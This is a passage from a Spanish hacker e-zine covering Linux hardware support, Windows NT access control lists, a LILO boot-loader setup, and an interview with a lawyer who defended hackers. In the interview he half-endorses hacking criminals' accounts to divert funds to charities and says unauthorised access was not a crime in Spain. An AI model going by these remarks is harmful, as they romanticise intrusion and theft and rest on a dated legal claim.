siguientes: Adlib, Crystal, Ensoniq Soundscape, Gravis Ultrasound, Logitech,
Media TriX, Media Vision, Microsoft Sound System, OPTi, Sound Blaster (100 %
compatibles), Turtle Beach y puertos MIDI MPU-401.
MOUSES
Los siguientes mouses pueden ser utilizados con Linux:
* Mouse serie de Microsoft
* Mouse serial de Mouse Systems
* Mouse de Logitech serie o de bus
* Mouse de bus de Microsoft
* Mouse ATI XL
* Mouse PS/2
MODEMS
Todos los modems internos o externos (conectados a un puerto serie) deben
funcionar con Linux. Algunos frabricantes han creado lineas de modems que
solo funcionan con Windows 95, por lo que hay que tener mucho cuidado al
comprar, porque en Linux no sera posible hacerlos funcionar.
Todos los modems que funcionan bajo interfaz PCMCIA deben funcionar en Linux.
En lo que respecta a los Modem/Fax, necesitan software apropiado para
funcionar, pero hay que asegurarse de que el Modem/Fax cumpla con el estandar
de Fax Clase 2.0 porque es generalmente verdad que el software de Fax
disponible para Unix no funciona com Modems/Fax de Clase 1.0
IMPRESORAS
Todas las impresoras conectadas a un puerto paralelo funcionan en Linux, pero
al igual que los modems, algunos fabricantes han lanzado impresoras
designadas para trabajar solamente con el sistema Windows 95.
Muchos programas de Linux generan como salida de impresion documentos en
formato Postscript. En general este formato es entendido solo por impresoras
Laser y algunas otras impresoras avanzadas. Para solucionar este problema en
Linux podemos utilizar el programa Gostscript, que es un interprete del
formato Postscript para utilizar con las impresoras que no tiene el soporte
para este formato. Ghostscript posee, entre otros, drivers para las
siguientes impresoras:
* Impresoras Apple
* Cannon Bubble-Jet, LBP, LIPS III
* Impresoras DEC
* Epson 9 y 24 pines, y serie LQ.
* Epson Stylus con color.
* Una amplia variedad de las impresoras Hewlett Packard Deskjet, Paintjet y
Laserjet
* IBM, Oki, Okidata, Ricoh, Tektronix y Xerox
SCANNERS
Para trabajar con scanners en Linux se debe agregar el paquete SANE (Scanner
Access Now Easy), que es posible conseguirlo gratituamente en Internet, y
provee soporte para los siguientes scanners:
* Adara ImageStar
* Epson GT6000
* Fujitsu SCSI-2 Scanners
* Genius ColorPage, GS-B105G, GeniScan, GS-4000 y ScanMate
* Varios HP ScanJet
* Varios Logitech ScanMan
* Nikon CoolScan
OTROS DISPOSITIVOS
Linux puede trabajar con Touch-Screens, Joysticks, Terminales en los puertos
serie, una gran variedad de trajetas de captura de video, varios sistemas
de manejo de energia UPS, etc.
DISPOSITIVOS PLUG & PLAY
PnP fue inventado por Intel y Microsoft, en parte por eso y en parte por las
diferencias que existian con los desarrolladores de Linux por la forma en que
se habia implementado, Linux no daba soporte a los dispositivos PnP. Pero nos
guste, o no, la mayoria del harware, hoy, es PnP y Linux no tiene otra opcion
que trabajar efectivamente con el PnP.
Los Kernels actuales de Linux poseen soporte integrado para PnP. Esto
favorece a la aceptacion de Linux porque muchas personas se rehusaban a Linux
porque los dispositivos PnP no funcionaban. Hoy estamos en condiciones de
usar cualquier dispositivo PnP con Linux, siempre que sea 100% compatible con
algun dispositivo soportado por Linux.
[NdE: Hasta aqui la primera parte en realidad el articulo esta demasiado
largo como para meter en un solo numero (son 143 Kb) pero aseguro que tendran
la continuacion, pues ya tengo el file completo... asi que no problem]
Create By Mr. Nuk3m (
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
)
[I Hope so...]
:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:
-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-
..--:: 05. Access Control List - ACL ::--..
By ColuX
Introduccion
============
Se podria pensar que una ACL es como una etiqueta unida a cada archivo o
directorio (1). A los efectos de este apunte, unicamente, utilizare la
denominacion " Objeto " para denominar a la suma de " Archivos " y
" Directorios ", " Archivo " sera referido estrictamente a archivos (no
incluira directorios - como es común).
Una ACL controla las cuentas que pueden acceder al objeto con el que esta
relacionada. La ACL determina quien tiene acceso para: lectura, cambio o
borrado de archivos de datos, ejecucion de programas, ingreso y listado del
contenido de directorios; y muchos mas. La ACL NO es parte de los datos de
los objetos, se encuentra separada de estos y es posible visualizarla
dentro de "Propiedades" (Propieties) en archivos y directorios.
Todos los objetos que tienen una ACL tienen un "Propietario" (nombre de la
cuenta de usuario). Cuando un usuario crea un objeto, NT de forma
automatica asigna el nombre de usuario como propietario del objeto
(Ownership). El propietario puede cambiar la ACL segun necesidad; por
ejemplo: cambiar los permisos de acceso, permitir a otras cuentas la
modificacion de la misma ACL o la "Toma de Posesion" (Take Ownership) del
objeto y por lo tanto de la misma ACL.
Grupos
======
Una ACL puede dar permisos especificos de acceso a objetos, a usuarios o
grupos de usuarios, debido a estos comenzaremos a tratar el tema de grupos
y como se administran. Un grupo es una lista de usuarios, a pesar que los
administradores se encargan de la administracion de los grupos, los
usuarios comunes pueden crear y mantener grupos en sus estaciones de
trabajo (workstation). El uso de grupos facilita la administracion y reduce
los posibles errores de administracion al utilizar un solo nombre (del
grupo) en vez de largas listas de usuarios, ademas del caso de tener
asignado un grupo, por ejemplo con acceso read a directorios, y en el caso
de dar de alta a dos nuevos usuarios en este grupo, se tiene la certeza que
estas altas tendran los accesos que corresponden.
Trataremos ahora dos clases de grupos "local" y "global" distinguiendo sus
diferencias.
Un grupo local es definido sobre una estacion de trabajo en particular y
puede ser usado solo en las ACLs de ese equipo. El grupo local puede
incluir cualquier cuenta de usuario y /o grupos globales visibles desde la
estacion de trabajo, pero no otros grupos locales.
Un grupo global es definido a través del dominio y es visible por todo el
dominio y/o otros dominios (segun las relaciones de confianza establecidas
entre ellos). Los grupos globales -el término mas adecuado seria "grupos
del dominio"- incluyen solo cuentas de usuario del propio dominio y solo
los administradores pueden crearlas.
Aunque pueden convivir grupos locales con el mismo nombre en dos estaciones
de trabajo distintas, cada uno de estos tendra su propio listado de cuentas
o grupos globales y bien pueden reunir distintos conjuntos de personas que
accederan a distintos objetos por diferentes propositos.
La clave de la administracion es utilizar cada grupo solo en las ACLs de la
estacion de trabajo en cuestion.
En el caso de los grupos globales, pueden visualizarse dos, de distintos
dominios, con el mismo nombre y estos ser incluidos en una misma ACL, dado
que los nombres son antecedidos por el nombre del dominio (en un mismo
dominio NT obvia por defecto el prefijo).
ACLs para archivos
===================
El uso de ACLs para los archivos, es relativamente mas simple que para
directorios. La ACL es una propiedad de un archivo o directorio y se accede
y administra desde el boton "Permisos" (Permissions), en la ventana de
"Seguridad" (Security).
Una ACL es en realidad una lista de accesos (entries). Cada acceso tiene el
nombre de una cuenta de usuario o un grupo, y un conjunto de permisos
aplicados a las cuentas o las cuentas de los grupos. La ventana ACL (que es
titulada como Permisos de Directorio -Directory Permissions- o Permisos de
Archivos -File Permissions-) lista los accesos (cuentas o grupos) uno por
linea y en orden alfabético. La documentacion de NT denomina una "entrada
ACL", es decir una cuenta o grupo y su tipo de acceso, como una Access
Control Entry -ACE-.
Permisos
La ventana de Permisos de Archivos, muestra los Permisos Basicos para cada
acceso entre paréntesis, ejemplo: (RWX) o (ALL). Los permisos indican
especificamente, que puede realizar el usuario con un archivo.
Permisos basicos para archivos
------------------------------
Read ( R )...Leer los datos del archivo.
Write ( W )...Modificar los datos, añadiendo o eliminando parte de estos.
Execute ( X )... Solo aplicable a archivos con extension .exe, permite
justamente correrlos. Los archivos que no sean ejcutables pueden tener este
permiso, pero no tiene efecto.
Delete ( D )... Eliminar el archivo, (también se puede realizar esto con
"Control Total", comentado mas adelante)
Change Permissions ( P )...Modificar la ACL, pero sin cambio de propietario
Take ownership ( O ) ... La cuenta que ejecute este permiso se hara
propietaria del archivo, pero esto no cambia la ACL.
De ningun modo, la asignacion de estos permisos implica la asignacion
implicita de otro, por ejemplo: la concesion de "Escritura" (W) solamente,
no permite "Lectura" (L). NT utiliza palabras especiales "(All)" para
asignar todos los permisos y "(No Access)" para ninguno (None).
El propietario del archivo posee permiso (P) implicito. Consecuentemente
una ACL puede prevenir el acceso, por ejemplo Read, a un archivo a usuarios
y/o propietario con permisos (P), pero no puede evitar que ellos cambien
los accesos de la ACL, otorgandose ellos mismos algun tipo de acceso, por
ejemplo (W) o hasta permiso (O). Es decir que otorgando a un usuario o
grupo accesos (P) o (O), se permite el eventual acceso indebido a datos e
informacion.
Para conveniencia del usuario la ventana ACL ofrece un conjunto de
permisos, denominado Standart Permission Sets, que agrupa varios de los
permisos basicos:
Conjunto de permisos estandares para archivos
---------------------------------------------
No Access ( None )... Utilizado para evitar todo acceso a un archivo, (como
el nombre del archivo es guardado en el directorio parent, al proteger un
archivo con este permiso, se ocultara hasta el nombre del mismo).
Read ( RX )... Lectura sin cambios, en caso de *.exe su ejecucion.
Change ( RWXD )... Permite casi todos los accesos, excepto cambiar la ACL
(P) y toma de posesion (O).
Full Cvontrol ( All )... Permite todos los accesos (RWXDPO), excepto cambio
de propietario: es imposible asignar un propietario a una cuenta distinta a
la propia.
Special Access ( ... )... Permite construir un set de permisos, eligiendo
cualquier combinacion de los permisos Basicos. No obstante no es
recomendable su construccion y uso.
Acceso
------
Cuando un usuario, intenta el acceso a un archivo de alguna forma, la
cuenta de usuario es testeada contra la ACL de la siguiente forma:
(1). NT considera el permiso asignado para la cuenta de usuario, si
esta presente,
(2). Se consideran los permisos para los grupos en que esta cuenta
sea miembro, si corresponde.
Si no se encuentran declarados permisos, el acceso es negado.
Si al menos una de las entradas es "No Access", el acceso es negado, mas
alla que tenga alguna otra entrada con permisos.
Es decir que, todos los permisos son recolectados desde todas las entradas
definidas y esta combinacion es la que determina el acceso.
ACLs para Directorios
======================
Un directorio es un "objeto" separado de los archivos o subdirectorios que
contenga. Cada directorio posee una ACL que controla el acceso al
directorio en si mismo, por ejemplo viendo los nombres de los items del
directorio y sumando nuevos items al directorio. Esta ACL también controla
la lista de usuarios que pueden acceder al directorio, de esta manera,
indirectamente, protege a todos los items contenidos en su arbol.
La ventana de administracion de la ACL de directorios luce similar a la de
archivos. La mayor diferencia es que cada entrada posee dos conjuntos de
permisos contenidos ambos entre paréntesis.
Los permisos sobre la izquierda, estan referidos a los permisos de acceso
al directorio en si mismo.
Los permisos sobre la derecha, no se refieren al directorio, sino que seran
utilizados unicamente para determinar los permisos de acceso, de los nuevos
archivos a crear en el directorio referido, ACL inicial de un nuevo archivo.
Permisos y accesos basicos para directorios
-------------------------------------------
Read ( R )... Lectura de los nombres de los items contenidos en el
directorio, sin permiso de lectura de los datos en ellos contenidos, NT no
permite el acceso a un archivo, mas alla de estar permitido por la ACL del
archivo, si no se tiene acceso ( R ) al directorio parent.
Write ( W )... Permite la creacion de nuevos subdirectorios y archivos
contenidos en el directorio, la cuenta que lo crea sera la propietaria de
estos y la ACL inicial sera determinada por la ACL del parent.
Execute ( X )... Permite a un programa crear un directorio sobre el
directorio de trabajo. Por ejemplo es necesario ( X ) para en, MS/DOS poder
realizar un comando CD para ingresar a un directorio. El permiso ( X ) en
directorios normalmente puede generar confusion o inhabilitar a un usuario
genuino el acceso a un recurso legitimo, para evitar esto es conveniente
aplicar la siguiente regla: No utilizar X sin R o W; siempre aplicar X con
R y/o W, (esto vale solo para directorios no para archivos).
Delete ( D )... Eliminacion del directorio. Obviamente para poder eliminar
un directorio, es imperioso poseer el mismo nivel de acceso con los items
contenidos en el directorio. Recordar que cada item posee su propia ACL!.
Change Permission ( P )...Al igual que en el caso de archivos: modificacion
de la ACL, sin posibilidad de cambio de propietario.
Take Ownership ( O )... Al igual que en el caso de archivos: toma de
posesion del directorio.
Conjunto de permisos estandar para directorios
----------------------------------------------
No Access (None)...Imposibilita totalmente el acceso al arbol del directorio
List (RX)... Permite a los usuarios ver el nombre de los items del
directorio e ingresar a los subdirectorios, si las ACLs de estos lo
permiten. Permiso unico para directorios, no aplicable para archivos.
Read (RX)... Similar a List.
Add (WX)... Permite crear nuevos items en el directorio, pero no visualizar
los nombres de los existentes. También permite pasar a través de los
subdirectorios. Permiso unico para directorios, no aplicable para archivos.
Add and Read (RWX)... Igual a Add mas la posibilidad de ver todos los
nombres de los items del directorio. Permiso unico para directorios, no
aplicable para archivos.
Change (RWXD)... Control total sobre el directorio, excepto modificacion de
ACL y toma de posesion. Recordar que cada item posee su propia ACL!.
Full Control (ALL)... Todos los permisos basicos, mas: permiso para
eliminar archivos o subdirectorios vacios pasando por alto las ACLs de los
propios items!.
Special Directory Access (...)... Al igual que con archivos, permite
construir combinaciones especificas.
Special File Access (...)... Utilizado para un conjunto a medida de
Permisos Basicos para las ACLs de uso por defecto para archivos.
Propagacion de ACLs - proteccion "arbolar"
-------------------------------------------
¿Como setea NT las ACLs de un nuevo archivo o directorio respecto al
directorio parent?.
En el caso de construir un "file tree" sin indicar de manera explicita los
cambios en las ACLs de estos nuevos items, la ACL del directorio root
determinara las ACLs de todos los items que de él dependan. Esto facilita,
parcialmente, las tareas de administracion de seguridad, dado que
automaticamente protege totalmente el crecimiento "arbolar" con el seteo de
la ACL del root.
CREATOR OWNER para Archivos
---------------------------
Es posible dar permisos a la cuenta que crea un archivo, con el agregado de
una entrada en la ACL del directorio con la denominacion de "CREATOR OWNER".
Esta no es realidad una cuenta real y el sistema NT la ignorara a los
efectos de control de acceso. Esta entrada sera una "special flag" que NT
utilizara cuando construya la ACL de un nuevo archivo, los permisos de
defectos que posea la cuenta CREATOR OWNER seran dados a la cuenta que crea
el nuevo archivo en el directorio.
Es conveniente el uso de CREATOR OWNER, cuando se desee dar a los creadores
de nuevos archivos, un conjunto de permisos de manera automatica.
CREATOR OWNER para Directorios
------------------------------
CREATOR OWNER tiene las mismas caracteristicas y propositos para diectorios
como para archivos. Los permisos de acceso a directorios que se definan
para la cuenta CREATOR OWNER, seran dados al usuario que cree un nuevo
directorio, sobre ese mismo directorio. Como extra la entrada CREATOR OWNER,
propagara la ACL sin modificaciones de los nuevos subdirectorios.
----------------------
|
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
|
----------------------
:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:
-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-
..--:: 06. Entrevista al Abogado de la Causa ::--..
By Mr. Nexus
[NdE: Siii como no..!!!, lo puse ahi como para no decir que no escribio nada
en este numero XDDD]
Tenemos con nosotros a Carlos Sanchez Almeida, tambien conocido como 'El
Abogado de la Causa' por su defensa de los 'chicos malos' ante los
tribunales espa~oles, y por sus articulos nunca faltos de critica e ironia
en el boletin semanal de Kriptopolis.
Aquel que dijo una vez aquello de: "Mi unica patria, la Red", nos lo ha
dejado muy claro a todo CDLR, a lo largo de unos cuantos mails y una amena
charla de IRC. Carlos Sanchez Almeida, ese que ya considera a los hackers
como parte de la familia, nos concedio estas lineas alla por finales del
a~o pasado, con la idea de incluirlas en una edicion especial de Proyecto_R
para el cambio de a~o, que desgraciadamente hubo que abandonar por razones
que supongo leereis en este numero del zine.
Pero no podiamos permitir que una entrevista tan buena se perdiera para
siempre, asi que la hemos recuperado para este numero 9 de Proyecto_R, y
desde aqui esperamos que la disfruteis leyendola tanto como nosotros
haciendola.
Y ya no me enrrollo mas, os dejo con Carlos Sanchez Almeida, mucho mas que
un abogado.
- ¨ Como te defines, un abogado hacker, un hacker abogado o un tio raro que
anda con otros tios raros ?
Me gustaria ser un hombre libre, supongo que eso vale para cualquiera de
los terminos. En muchas ocasiones, aquellos que quisieron ser libres se
vieron forzados a tomar un barco pirata.
- Supongo que responderas que nada de hacker, sencillamente un abogado,
pero creo recordar que tambien dijiste una vez que la unica diferencia
entre un hacker y un abogado es que el primero busca errores en las
lineas de C y el segundo las busca en las leyes, ¨ nunca has sentido la
necesidad de pasarte al lado digital ?, ... o mojate mas, ¨ lo has hecho
alguna vez ?
Si no han conseguido pruebas, ¨para que lo iba a reconocer? Es broma :-)
Mi formacion no es tecnica, aunque llevo muchos a~os luchando configurando
tarjetas, irqs y demas, no paso de "usuario avanzado". Para ser un hacker
hace falta dominar a fondo materias en las que no he tenido tiempo de
profundizar.
- Ademas, ... los abogados tambien teneis un decalogo como el de los
hackers, aparece en tu pagina la rese~a al libro "El alma de la toga" de
la misma manera que aparece en muchas paginas hackers una nota con el
'Manifiesto Hacker', todo con la misma devocion hacia unas, ... 'leyes
ideales para un mundo perfecto', despues de todo, parece que es cierto
que un abogado y un hacker son parecidos.
Los abogados, los periodistas y los hackers se parecen en una cosa:
todos buscan los puntos debiles del sistema. Jaquearlo y salir bien del
reto ya es otra cosa. No hay leyes ni mundos ideales, pero tenemos que
creer que algun dia puede haberlos.
- Confiesa, ¨ que sistema operativo prefieres ?, ¨ y cual usas ?
Todavia no puedo decir que prefiera un sistema, esta por construir.
Creo que un buen sistema seria aquel que siempre se pudiese reconstruir,
que permitiese modificarlo asegurando los datos, sobre la marcha. Y hoy
por hoy, no existe, aunque el software libre esta en el buen camino.
Desgraciadamente, y pese a mis simpatias por Linux, me veo obligado a
utilizar Windows, dado que las bases de datos de legislacion y
jurisprudencia no soportan otro sistema operativo: todas las
multinacionales se quieren.
- Ahora es comun encontrarse un link a tu pagina WEB (www.bufetalmeida.com)
en paginas de hackers, incluso tu mismo tienes links a ese tipo de
paginas, lo cierto es que ya practicamente todo el mundo 'Underground' te
conoce como 'El abogado de la causa', ¨ que tal sienta ser conocido y
admirado por unos seres tan 'especiales' como son los hackers ?
Espero que no sea cierto, no he hecho nada especial para ser admirado. Me
conformo con que me consideren uno mas, alguien a quien le preocupan las
libertades. En la medida que a ellos tambien les preocupe, me sentire mas
satisfecho. Porque la libertad no es un problema solo de abogados o
hackers, nos deberia concernir a todos.
- ¨ Y eso no te hace ser la 'oveja negra' de la abogacia ?, o sea, ¨ que
opinan tus compa~eros abogados de la relacion tan estrecha que mantienes
con los hackers ?
La mayor parte lo ve bien, saben que hago mi trabajo. Los abogados sabemos
que el adversario nunca es el compa~ero que tienes enfrente, sino el
cliente al que representa. En Internet hay muchos intereses, y es normal
que haya abogados que defiendan unos u otros. Mis enemigos no visten toga,
ni tan siquiera la de juez.
- No se si lo lectores de PR se habran fijado pero el dise~o de tu pagina
WEB posee el tipico estilo hacker, el fondo negro, contraste con blanco,
graficos impactantes,... todo muy under, ¨ premeditado ?
Decidi desde el principio que fuesen letras blancas sobre fondo negro.
El traje clasico de los abogados en Espa~a es asi: toga, traje y corbata
negra, camisa blanca. Es un color muy "profesional". Tambien es el color
de la Jolly Roger, la bandera pirata. Al principio no habia graficos, era
todo texto El dise~o de la homepage fue posterior, y es obra de un todo un
personaje del mundillo under, al que le estoy muy agradecido.
- Si seguimos mirando la pagina WEB vemos que has escrito una coleccion
importante de articulos, casi siempre criticas hacia el sistema. Estos
textos tienen la particularidad de hacer asomar una sonrisa en los
lectores, debe ser por el caracter epico-romantico de la figura hacker
que transmiten esas lineas. Se nota que posees el don que tenian aquellos
hackers de la 'primera' epoca, cuando The Mentor escribio el tan elogiado
'Manifiesto Hacker'. Creo que es esa cualidad tuya la que hace que hace
que seas tan admirado entre los seguidores de los hackers de la 'vieja
escuela', ¨ algun comentario ?
Creo que no he hecho ningun merito que justifique admiracion alguna. Aunque
si consigo arrancar alguna sonrisa a mis lectores, como dices, pues ya me
conformo. El mundo real y la Red, en tanto que reflejo del primero, vive
tiempos dificiles en lo que se refiere a las libertades. Como dice el
soneto de Miguel Hernandez, "voy entre pena y pena sonriendo".
- Me ha llamado la atencion que el Bufet Almeida tambien ofrece servicios
de auditorias de seguridad a sus clientes, realmente no es un servicio
comun en los abogados, :-) ¨ nos cuentas como surgio la idea?
Bufet Almeida actua simplemente como "business partner" de empresas de
seguridad informatica. Empresas que consideran que el mejor experto en
seguridad es, por definicion, un hacker. Un empresario inteligente sabe
que vale mas tenerlos dentro y contentos, que fuera y sedientos :-)
- Saltaste a la fama con el conocido caso de !Hispahack, este proceso tuvo
un amplio seguimiento por parte de muchos medios de comunicacion,
incluidos los tipicos reportajes sensacionalistas y todo eso, pero ¨ en
realidad porque adquirio tanta fama ?, ¨ es que ha sido el unico caso de
hacking que se ha llevado a los tribunales o fue simplemente escogido por
unos periostas hambrientos de noticias ?
El caso !Hispahack tuvo amplio seguimiento solo en su inicio, cuando se
produjeron las detenciones. La cobertura en dicho momento fue absolutamente
sensacionalista, destacando el hecho de que unos hackers habian modificado
la pagina Web del Congreso de los Diputados, y habian accedido a la NASA.
A medida que el caso fue desinflandose por falta de pruebas, solo los
verdaderos -y verdaderas- periodistas profundizaron en el. El tratamiento
informativo de la sentencia fue muy inferior al de las detenciones, y si el
tema sono fue gracias a la Red, demostrando que determinado tipo de
periodismo tiene los dias contados.
- Por lo que he leido acerca de estos casos de delitos informaticos, tengo
la sensacion de que siempre terminan a favor del acusado porque los
cuerpos de seguridad incumplieron los procedimientos legales, ¨ es eso
cierto ?
Son casos complicados y novedosos, y se prestan a muchas confusiones.
Por eso he insistido siempre que la investigaciin de estos casos deberia
estar supervisada desde el principio desde el Juzgado. Espero que con la
famosa Fiscalia de Delitos Informaticos, ahora que despues de tanto
insistir la han conseguido, la cosa vaya mejorando. Y lo digo porque la
Declaracion de Derechos de Internet del Senado Espa~ol deja muy claro lo
siguiente: "El ordenador personal y el domicilio electronico son
inviolables. Ninguna entrada o registro podra hacerse sin consentimiento
del titular o resolucion judicial, salvo en caso de flagrante delito. Se
garantizara el secreto de las comunicaciones electr¢nicas y la privacidad
de los datos".
- Una de las 'leyes de conducta' de los hackers es que sean paranoicos con
el tema del Big Brother, ... ¨ crees que realmente el Gran Hermano nos
esta mirando o es un cuento chino para acojonar a los 'chicos malos' ?
Como decia hace poco Vazquez Montalban, el nombre del Ministro del Interior
espa~ol, Mayor Oreja, es toda una metafora ;-)
- "Defecto 2000, con D de da~o, con D de deuda, con D de defensa", Carlos
Almeida dixit. ¨ Realmente es tan peligroso como lo pintan o se trata mas
bien de un truco de las empresas para vender los productos 'y2k
compliant' ?
Hace poco leia que el primer aviso del Defecto 2000 es de 1960, hace 40
a~os. Un informatico al que nadie quiso oir, advirtio ya entonces del
problema. Si el sistema capitalista durase 9 milenios mas -que no los
durara, antes se acaba el planeta- tendriamos un efecto 10000. El Defecto
2000 lo han provocado aquellos que se han enriquecido solucionando el
problema. Si hay algun juicio, sera por estafa.
- En tu pagina WEB se puede leer esto: " Si se ha de pasar una temporada en
prision, que al menos sea por un delito inteligente, que lleve aparejada
una pena menor. El carding y el cracking, por citar solo dos ejemplos, no
pertenecen a esta ultima categoria." Ya sabemos que el delito 'casi'
nunca es rentable pero, ¨ el hacking merece la pena ?, o para no
comprometer demasiado, ... Condenas vs. Satisfaccion del Hacker, ¨ que
parte crees que pesa mas ?
La actuacion delictiva con animo de lucro, con animo de causar da~o, nunca
es rentable. Ahora bien, si a alguien le diese por jaquear las cuentas de
fabricantes de armas, de blanqueadores de dinero, de redes criminales, y
desviar esos fondos hacia ONG solidarias, ¨nos rasgariamos las vestiduras?
El sistema permite que haya paraisos fiscales, y eso deja muy claro quien
gobierna realmente. ¨Permitiremos que tambien existan paraisos de datos?
El hack es un arma en manos de la sociedad civil, y todas las armas tienen
doble filo.
- Deja a un lado las leyes,... ¨ el hacking 'de verdad' deberia ser delito?
¨Y donde esta la verdad? El hack "de verdad", como yo lo entiendo, no es
delito ni siquiera en Espa~a. El Codigo Penal solo castiga la revelacion
de secretos y los da~os informaticos, pero no hay un precepto que castigue
el acceso a un sistema informatico.
- ¨ Como compatibilizarias el uso exclusivo y excluyente a que se supone da
derecho la -posesion- de un bien, con la actividad hacker?
El derecho de propiedad llevado al extremo no es compatible con ningun otro
derecho. La vida, la libertad, la igualdad, la educacion, deben ser
derechos prioritarios, y la propiedad debe utilizarse al servicio de
aquellos.
- La propiedad intelectual esta garantizada constitucionalmente en casi
todos los paises de tradicion latina. ¨ Crees que el hecho de que la
informacion guardada en computadores personales, cubiertas por este
derecho, pierden su calidad de tales (o de propias de su due~o), al
iniciar un trafico por internet ?
Para un territorio nuevo como es Internet, hace falta un derecho nuevo. Las
ideas juridicas del mundo "real" solo pueden trasladarse con dificultades a
Internet. En principio, si se informa en una pagina que determinados
contenidos estan sujetos a copyright, ello deberia respetarse, y perseguir
a los que copien con animo de lucro. Pero que se olvide el autor de evitar
la copia: una cosa es protegerse del plagio y otra muy distinta pretender
que por cada lector se cobre un royalty: la copia sin animo de lucro ha de
ser libre en Internet.
- ¨ Que principios formadores del derecho podrian justificar atentados
contra la libre competencia en el comercio por internet, es decir, robo
de clientela, de cuentas de correo electronico, interceptar mensajes,
etc ... ?
Ninguno. Algo asi no puede justificarse desde el Derecho. Todo lo que se
menciona en las preguntas solo pueden entenderse en un marco de guerra
revolucionaria, y las guerras revolucionarias solo las justifica la
injusticia. Ninguna guerra es justa.
- Tan solo queda la pregunta del millon... ¨porque haces todo lo que haces?
Para sobrevivir. Nada da tanto sentido a la vida como saber que no hay otra.
Y aqui acaba esta entrevista, despues de mucho tiempo almacenada en
los discos duros por fin sale a la luz :-) Ya solo queda desear desde CDLR
toda la suerte del mundo a Carlos, porque realmente se lo merece.
Preguntas de CDLR staff, colaboradores, amigos, ...
Comentarios a:
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:
-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-
..--:: 07. LiLo para Linux ::--..
By MTS
Como me imagino que todos hemos tenido problema con el famoso LiLo, tuve
que hacer este texto, para que no les pase lo mismo.
Todo esto tuve que hacerlo bajo el red Hat 5.0. pa 5.2 tb funka 6.0 tb y 6.1
tb..
LILO es un boot loader, que permite iniciar la maquina según unas directivas
muy concretas, ademas permite pasar parametros al kernel y lo mejor que hace
es iniciar otros sistemas que no sean Linux.
debes saber que yo tengo 2 discos uno de 600Mb para linux que esta como
primary master y el otro secundary master de 408MB para jugar al Duke3D y
para que mi hermana chica ocupe le Windors 95 version ABCDEFGHIJKLMNÑOPQRS
TUVWXZ.
cuando instale linux no tenia el disco de 408 puesto en el pc, asi cuando lo
conecte y hize el lilo a manito quedo la cagada se via linda la pantalla con
/S. y me pegue la craneada y leyendo textos por ahi salio esto.
Este es como quedo mi lilo al final
boot=/dev/hda
compact
map=/boot/map
install=/boot/boot.b
message = /boot/bootmesg.txt # Texto
prompt
timeout=250
image=/boot/vmlinuz-2.0.32
label=linux
root=/dev/hda2
read-only
other=/dev/hdb1
label=win
loader =/boot/any_d.b
table=/dev/hdb
Esto es el disco donde se instala el lilo, en este caso el primer disco.
osea el que tiene linux en mi caso.
boot = /dev/hda
Tiempo de reflexion, decimas de segundos
delay = 50 en mi caso no lo ocupo
La pantalla la queremos en modo VGA, otros modos son disponibles, como
extended
vga = normal
en mi caso no lo ocupo
No queremos que cree un ramdisk, disco virtual en memoria, esta opción se
necesita para crear los discos boot y root de instalacion
ramdisk = 0
Para que Salga un mensaje para tus amigos que no cachan nada de Linux y
especialmente para que tus hermanos no entren a linux y lo apaguen justo
cuando este leyendo el HD, obviamnte deben saber leer, sino cagaste.
message = /boot/bootmesg.txt # Texto puede ir en cualquier directorio
en el cual ese archivo bootmesg.txt en mi caso tiene lo Siguiente :
------------------------------------------------------
Bienvenido al PC del MTS
Escriba win para entrar a Windows 95
o
Escriba linux para entrar a Linux Red Hat 5.0
------------------------------------------------------
al final pongo uno mas bonito :
Nombre por el cual se le identifica, esto permite durante la fase inicial de
boot darle un nombre, con este fichero primero hay que darle a la tecla ALT
y luego la tecla TAB se indicara todas las opciones de boot posibles.
label viene de etiqueta.
label = linux --> esto es lo que escribes en lilo para que entres.
Que monte la particion /root en modo solo lectura para verificar el sistema
de
ficheros.
read-only
other indica que no es un sistema operativo Linux. despues viene el otro
disco
IDE
other = /dev/hdb1
label = win
Aqui viene el truco, /boot/any_d.b, permite swapear los devices, MS/Dos cree
que
ha arrancado desde C: cuando en realidad lo hace desde D:, una vez arrancado
veo
el disco como C:
loader = /boot/any_d.b
pero te daras cuenta que este archivo no existe en tu linux, aja, copy el
archivo
que si esta que es el os2_d.b con ese nombre o sino loader = /boot/os2_d.b
pero
lo hize para que se viera bonito.
Muy importante, indicarle donde se encuentra la tabla de particiones, en
este
caso el segundo disco de IDE
table = /dev/hdb
Por limitaciones de la BIOS y LILO depende, de momento, de ella, solo se
puede
arrancar de los dos primeros discos, sea hda y hdb.
*********************************************************************
IMPORTANTE
*********************************************************************
Una vez se tiene el fichero de configuración terminado la orden para
instalarlo
es :
lilo -C /path_donde_este/fichero_de_configuración
el -C sirve para instalarlo en el MBR (Master Boot Record) del disco
declarado como boot. o tambien para compilarlo
/sbin/lilo
hace lo mismo
*******************************************************************
para configurar todos estos cambio use el editor que le gusta al Punky osea
el PICO.(Pine Composer, pa' los mal pensados).
yo prefiero vi :P
uta pero como le pongo password ?
R: weno hace lo siguiente en la primera linea del lilo.conf pon esto :
password='clave'
y despues te sales y en la shell
un lilo -C ...
ohhh
pero la passwd quedo visible...
y cualquiera puede hacer un cat
r:weno hace lo siguiente
editalo y borra esa linea
pero NO vuelvas a hacer un lilo -c
y esta okaz
Pruebalo ..........
cualquier comentario o sugerencia escriba a
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
se agradece al Pequeño Saltamontes del Jerunel
que se encuentra junto conmigo en el Canal #waReZ de IrC de CHile
pero para chatear con el, tienes que poner un timer de 1000 y preguntarle
si esta ahi, para que cuando valla en el 999 te diga que si..
:P
